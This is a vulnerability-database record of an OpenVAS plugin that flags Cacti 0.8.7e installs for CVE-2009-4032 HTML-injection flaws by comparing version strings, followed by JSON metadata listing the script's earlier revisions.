ID OPENVAS:1361412562310100361 Type openvas Reporter This script is Copyright (C) 2009 Greenbone Networks GmbH Modified 2019-03-07T00:00:00
Description
Cacti is prone to multiple HTML-injection vulnerabilities because it fails to
properly sanitize user-supplied input before using it in dynamically generated content.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: cacti_37109.nasl 14031 2019-03-07 10:47:29Z cfischer $
#
# Cacti Multiple HTML Injection Vulnerabilities
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE used below to look up the port and version of the detected Cacti install.
CPE = "cpe:/a:cacti:cacti";

# Description mode: register the VT's metadata and leave before any check
# code runs (see the exit(0) that closes this block).
if (description)
{
  # --- Identity and bookkeeping ---------------------------------------------
  script_oid("1.3.6.1.4.1.25623.1.0.100361");
  script_name("Cacti Multiple HTML Injection Vulnerabilities");
  script_version("$Revision: 14031 $");
  script_family("Web application abuses");
  script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
  script_tag(name:"last_modification", value:"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $");
  script_tag(name:"creation_date", value:"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)");

  # --- Vulnerability identifiers and severity -------------------------------
  # The CVSS v2 vector scores integrity impact only (C:N/I:P/A:N), while the
  # "impact" text below also mentions theft of cookie-based credentials;
  # triage on the described impact, not on the base score alone.
  script_cve_id("CVE-2009-4032");
  script_bugtraq_id(37109);
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"solution_type", value:"VendorFix");

  # --- References -----------------------------------------------------------
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/37109");
  script_xref(name:"URL", value:"http://cacti.net/");
  script_xref(name:"URL", value:"http://docs.cacti.net/#cross-site_scripting_fixes");

  # --- Scheduling and detection quality -------------------------------------
  # The check code only compares a version string; nothing is sent to the
  # target to confirm the flaw. qod_type "remote_banner" records that the
  # result rests on a remotely observed version.
  # NOTE(review): a version-only result cannot see a fix applied without a
  # version change (for example a distribution backport); confirm patch
  # state on the host before closing or escalating a finding.
  script_category(ACT_GATHER_INFO);
  script_dependencies("cacti_detect.nasl");
  script_mandatory_keys("cacti/installed");
  script_tag(name:"qod_type", value:"remote_banner");

  # --- Report text ----------------------------------------------------------
  # The continuation lines of the multi-line values start at column 0 on
  # purpose: the line breaks are part of the string literals.
  script_tag(name:"solution", value:"A patch is available. Please see the references for details.");
  script_tag(name:"summary", value:"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to
properly sanitize user-supplied input before using it in dynamically generated content.");
  script_tag(name:"impact", value:"Attacker-supplied HTML and script code would run in the context of the affected
browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the
site is rendered to the user. Other attacks are also possible.");
  script_tag(name:"affected", value:"Cacti 0.8.7e is vulnerable. Other versions may be affected as well.");

  exit(0);
}
include("host_details.inc");
include("version_func.inc");
# Version check for CVE-2009-4032: report the detected Cacti install when its
# version string is exactly "0.8.7e".
#
# NOTE(review): only an exact match on 0.8.7e is flagged, although the
# "affected" tag says other versions may be affected as well. The exit(99)
# at the end (presumably the "checked, not affected" result; confirm against
# the scanner's conventions) is therefore no evidence that a different
# version is free of the flaw.

# No port registered for the Cacti CPE: nothing to check.
app_port = get_app_port(cpe: CPE);
if (!app_port)
  exit(0);

# No version known for that port: the comparison below cannot be made.
app_vers = get_app_version(cpe: CPE, port: app_port);
if (!app_vers)
  exit(0);

# Any version other than 0.8.7e leaves through the exit(99) path.
if (!version_is_equal(version: app_vers, test_version: "0.8.7e"))
  exit(99);

# The report names no fixed release ("See references"), so the reader has to
# follow the VT's URL references to find the vendor patch.
msg = report_fixed_ver(installed_version: app_vers, fixed_version: "See references");
security_message(port: app_port, data: msg);
exit(0);
{"id": "OPENVAS:1361412562310100361", "bulletinFamily": "scanner", "title": "Cacti Multiple HTML Injection Vulnerabilities", "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.", "published": "2009-11-25T00:00:00", "modified": "2019-03-07T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "cvelist": ["CVE-2009-4032"], "type": "openvas", "lastseen": "2019-05-29T18:40:20", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 3, "enchantments": {"dependencies": {"modified": "2018-09-02T00:05:57", "references": [{"idList": ["JVN:09758120"], "type": "jvn"}, {"idList": ["EDB-ID:10234", "EDB-ID:33374"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:22951", "SECURITYVULNS:DOC:22850"], "type": "securityvulns"}, {"idList": ["FEDORA_2009-12560.NASL", "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "DEBIAN_DSA-1954.NASL", "FEDORA_2009-12575.NASL", "SUSE_11_0_CACTI-091202.NASL"], "type": "nessus"}, 
{"idList": ["DEBIAN:DSA-1954-1:7A11F"], "type": "debian"}, {"idList": ["OPENVAS:136141256231066584", "OPENVAS:66300", "OPENVAS:1361412562310831138", "OPENVAS:136141256231066300", "OPENVAS:1361412562310861611", "OPENVAS:100361", "OPENVAS:136141256231066592", "OPENVAS:66592", "OPENVAS:66584", "OPENVAS:861611"], "type": "openvas"}, {"idList": ["CVE-2009-4032"], "type": "cve"}, {"idList": ["PACKETSTORM:83264"], "type": "packetstorm"}, {"idList": ["04104985-D846-11DE-84E4-00215AF774F0"], "type": "freebsd"}, {"idList": ["SSV:15105", "SSV:18336"], "type": "seebug"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "9ce089900ba94d4e864a235d230ed653333edc805892b8c20a4527e786c83426", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-09-02T00:05:57", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", 
"http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: 
\"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["description", "modified", "sourceData"], "edition": 3, "lastseen": "2018-09-02T00:05:57"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated 
content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "18cf334a47869a48033a20d350811aae531722b43ef3abaf0d213360e354c853", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-08-30T19:28:16", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: \"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n 
script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T19:28:16"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to 
control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.", "edition": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "9ce089900ba94d4e864a235d230ed653333edc805892b8c20a4527e786c83426", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "7802a0c565901f489a8f5f8225f8127d", "key": "modified"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "a8912d1128df515701be10880c2df998", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "20d0616a6a0344bf19ca675de8c30139", "key": "description"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2018-02-06T13:18:04", "modified": "2018-02-06T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 8674 2018-02-06 02:56:44Z ckuersteiner $\n#\n# Cacti Multiple HTML Injection 
Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 8674 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-06 03:56:44 +0100 (Tue, 06 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name: \"URL\", value: \"http://www.securityfocus.com/bid/37109\");\n script_xref(name: \"URL\", value: \"http://cacti.net/\");\n script_xref(name: \"URL\", value: \"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n 
script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name: \"solution\", value: \"A patch is available. Please see the references for details.\");\n\n script_tag(name: \"summary\", value: \"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\nproperly sanitize user-supplied input before using it in dynamically generated content.\n\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the\nattacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.\nOther attacks are also possible.\n\nCacti 0.8.7e is vulnerable; other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n security_message(port: port);\n exit(0);\n} \n\nexit(0);\n", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-02-06T13:18:04"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2009-4032"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.", "edition": 4, "enchantments": {"dependencies": {"modified": "2019-03-07T20:18:58", "references": [{"idList": ["JVN:09758120"], "type": "jvn"}, {"idList": ["EDB-ID:10234", "EDB-ID:33374"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:DOC:22951", "SECURITYVULNS:DOC:22850"], "type": "securityvulns"}, {"idList": ["FEDORA_2009-12560.NASL", "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", 
"DEBIAN_DSA-1954.NASL", "FEDORA_2009-12575.NASL", "SUSE_11_0_CACTI-091202.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-1954-1:7A11F"], "type": "debian"}, {"idList": ["OPENVAS:136141256231066584", "OPENVAS:66300", "OPENVAS:1361412562310831138", "OPENVAS:136141256231066300", "OPENVAS:1361412562310861611", "OPENVAS:100361", "OPENVAS:136141256231066592", "OPENVAS:66592", "OPENVAS:66584", "OPENVAS:861611"], "type": "openvas"}, {"idList": ["CVE-2009-4032"], "type": "cve"}, {"idList": ["PACKETSTORM:83264"], "type": "packetstorm"}, {"idList": ["04104985-D846-11DE-84E4-00215AF774F0"], "type": "freebsd"}, {"idList": ["SSV:15105", "SSV:18336"], "type": "seebug"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "04699f324c9a0e535988a3cdb046da29550ad0a10b9187c0d0f88fec9ac57ea7", "hashmap": [{"hash": "32449658bfe7af4c84f88efc4f6cd90c", "key": "title"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "1f1a9727eba57e5ae91375d4dd8756ed", "key": "references"}, {"hash": "845ae7cd7395f6073e1e5e161fc806d4", "key": "href"}, {"hash": "a2a5904218b16c94aeebec7041709bcd", "key": "reporter"}, {"hash": "0be6e1ff4fa873d4c57d77925c112a4a", "key": "cvelist"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "83e24e49b236d288a342c976caf17810", "key": "pluginID"}, {"hash": "13306809b28ff041ef9450613f0bf834", "key": "published"}, {"hash": "a97a3aa76dd809229589d36c1102135a", "key": "description"}, {"hash": "4671876a5b3a1d8beabf7c805d0d951d", "key": "sourceData"}, {"hash": "239e98079e29ae495f96882251231d51", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100361", "id": "OPENVAS:1361412562310100361", "lastseen": "2019-03-07T20:18:58", "modified": "2019-03-07T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": 
"1361412562310100361", "published": "2009-11-25T00:00:00", "references": ["http://cacti.net/", "http://docs.cacti.net/#cross-site_scripting_fixes", "http://www.securityfocus.com/bid/37109"], "reporter": "This script is Copyright (C) 2009 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: cacti_37109.nasl 14031 2019-03-07 10:47:29Z cfischer $\n#\n# Cacti Multiple HTML Injection Vulnerabilities\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100361\");\n script_version(\"$Revision: 14031 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 11:47:29 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-25 11:49:08 +0100 (Wed, 25 Nov 2009)\");\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Cacti Multiple HTML Injection Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37109\");\n script_xref(name:\"URL\", value:\"http://cacti.net/\");\n script_xref(name:\"URL\", value:\"http://docs.cacti.net/#cross-site_scripting_fixes\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"cacti_detect.nasl\");\n script_mandatory_keys(\"cacti/installed\");\n\n script_tag(name:\"solution\", value:\"A patch is available. 
Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"Cacti is prone to multiple HTML-injection vulnerabilities because it fails to\n properly sanitize user-supplied input before using it in dynamically generated content.\");\n\n script_tag(name:\"impact\", value:\"Attacker-supplied HTML and script code would run in the context of the affected\n browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the\n site is rendered to the user. Other attacks are also possible.\");\n\n script_tag(name:\"affected\", value:\"Cacti 0.8.7e is vulnerable. Other versions may be affected as well.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!vers = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: vers, test_version: \"0.8.7e\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"See references\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "title": "Cacti Multiple HTML Injection Vulnerabilities", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2019-03-07T20:18:58"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "0be6e1ff4fa873d4c57d77925c112a4a"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "description", "hash": "a97a3aa76dd809229589d36c1102135a"}, {"key": "href", "hash": "845ae7cd7395f6073e1e5e161fc806d4"}, {"key": "modified", "hash": "239e98079e29ae495f96882251231d51"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "83e24e49b236d288a342c976caf17810"}, {"key": "published", "hash": "13306809b28ff041ef9450613f0bf834"}, {"key": "references", "hash": "1f1a9727eba57e5ae91375d4dd8756ed"}, {"key": "reporter", "hash": 
